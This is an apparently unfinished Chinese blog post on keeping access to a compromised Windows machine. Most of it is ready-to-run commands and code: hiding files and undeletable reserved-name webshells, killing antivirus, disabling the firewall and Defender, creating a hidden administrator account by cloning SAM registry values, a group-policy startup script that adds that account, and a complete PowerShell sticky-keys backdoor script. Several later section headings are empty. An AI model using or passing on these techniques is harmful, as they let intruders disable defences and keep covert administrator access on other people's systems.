Mamor's Blog
0%

权限维持-Windows篇(待完成)

发表于 更新于 分类于
本文字数: 2.9k 阅读时长 ≈ 3 分钟

Windows权限维持

隐藏技巧

文件隐藏

attrib +s +a +h +r c:\test

把原本的⽂件夹增加了系统⽂件属性、存档⽂件属性、只读⽂件属性和隐藏⽂件属性。

系统文件夹图标
步骤
  • 1.新建文件夹 并将文件存入
  • 2.修改命名为 我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D} 然后访问该文件夹,打开会打开我的电脑
  • 3.如果需要查看内容 可以使用winrar 等去查看或 恢复
代号
1
2
3
4
5
6
我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
回收站.{645ff040-5081-101b-9f08-00aa002f954e}
拔号⽹络.{992CFFA0-F557-101A-88EC-00DD010CCC48}
打印机.{2227a280-3aea-1069-a2de-08002b30309d}
控制⾯板.{21ec2020-3aea-1069-a2dd-08002b30309d}
⽹上邻居.{208D2C60-3AEA-1069-A2D7-08002B30309D}
畸形目录
1
2
3
4
5
6
7
#创建目录
md a...\      //三个点,实际显示为 a..
#复制文件
copy test a...\test
#删除目录
rd /s /q a...\

##### 利用系统保留文件名创建无法删除的webshell

(注: 火绒就可以粉碎...)

Windows 下不能够以下面这些字样来命名文件/文件夹,包括:aux,com1,com2,prn,con和nul等,但是通过cmd下是可以创建此类文件夹的,使用copy命令即可实现

1
2
3
4
5
6
7
8
9
10
11
# 方法
copy 1.jsp   \\.\E:\test\aux.jsp
del \\.\E:\test\aux.jsp
type \\.\E:\test\aux.jsp

#可以使用attrib隐藏文件 
#这种在设置显示隐藏文件后/dir  也无法看到
attrib 1.txt //查看⽂件属性 
attrib 1.txt -r -s //删除⽂件属性
attrib +H +S 1.asp 改变⽂件属性,隐藏1.asp
attrib -H -S 1.asp
驱动级文件隐藏

可以利用 Easy File Locker 对文件夹进行隐藏

下载链接: http://www.xoslab.com/efl.html



关闭杀软

1
2
3
4
5
6
//meterperter中使用
run killav 
//关闭防火墙
netsh advfirewall set allprofiles state off 
//关闭windowsdefender
net stop windefend

还有几个大佬github上关杀软的项目

https://github.com/Yaxser/Backstab

https://github.com/Yihsiwei/GetOut360


影子用户

1.创建隐藏账户
1
2
3
#创建完成后仍可以通过计算机管理和登录处看到该用户
net user test$ Test.123 /add
net localgroup administrators test$ /add
2.打开注册表 regedit 修改权限

HKEY_LOCAL_MACHINE\SAM\SAM 的adminstrator权限修改为完全控制和读取,然后重新打开注册表便可继续查看内容

3.导出test$账户的reg 和 对应类型(0xXX的那个文件)和administrator对应十六进制的注册表

路径为HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names

4.将test$对应的00000XXX.reg的 F值替换为administrator 对应00000XXX.reg的F值
5.删除test$用户

net user test$ /del (删除后注册表里的test$用户就无法打开了)

6.在cmd导入test$的两个注册表

(这样就不会在计算机管理和登录页面看到创建的账户了,但仍可以在组成不SAM下看到,登录后会在计算机管理中显示该用户,想要清除该用户需要在注册表清除)

1
2
regedit  /s 1.reg
regedit  /s 2.reg
7.使用3389登录 会 登陆到administrator 的当前状态下 实现adminstrator账户的克隆


组策略

win+R gpedit.msc 打开本地组策略编辑器 选择计算机管理->WIndows设置->脚本(启动/关闭) 选择启动或关闭 添加bat脚本

1
2
3
4
@echo off
net user test$ Test.123 /add
net localgroup administrators test$ /add
exit


粘滞键后门

Shiftkey

Set-ExecutionPolicy Unrestricted

Import-Module .\shiftkey.ps1

运行一次会启动 再次运行会删除 在用户登录下为当前用户权限,在登录界面为system权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\" 
$keyName = "sethc.exe" 
$stringName = "Debugger" 
$binaryValue = "C:\Windows\System32\cmd.exe"
IF (Test-Path ($registryPath + $keyName)) 
{
      # Sticky Keys backdoor exists.    
     write-host "Registry key found. Let's remove it."    
     #New-Item -Path $registryPath -Name $keyName | Out-Null    
     Remove-Item -Path ($registryPath + $keyName) | Out-Null    
     write-host "Sticky Key backdoor has been removed."    
}
ELSE 
{    
     # Sticky Keys backdoor does not exist, let's add it.    
     write-host "Registry key not found. Attempting to add Sticky Keys backdoor to registry."    
     New-Item -Path $registryPath -Name $keyName | Out-Null    
     New-ItemProperty -Path ($registryPath + $keyName) -Name $stringName -Value $binaryValue | Out-Null     
     write-host "Sticky Keys backdoor added."     
}


劫持后门


注册表


计划任务


新服务


内存马

欢迎关注我的其它发布渠道

------------- 💖 🌞 本 文 结 束 😚 感 谢 您 的 阅 读 🌞 💖 -------------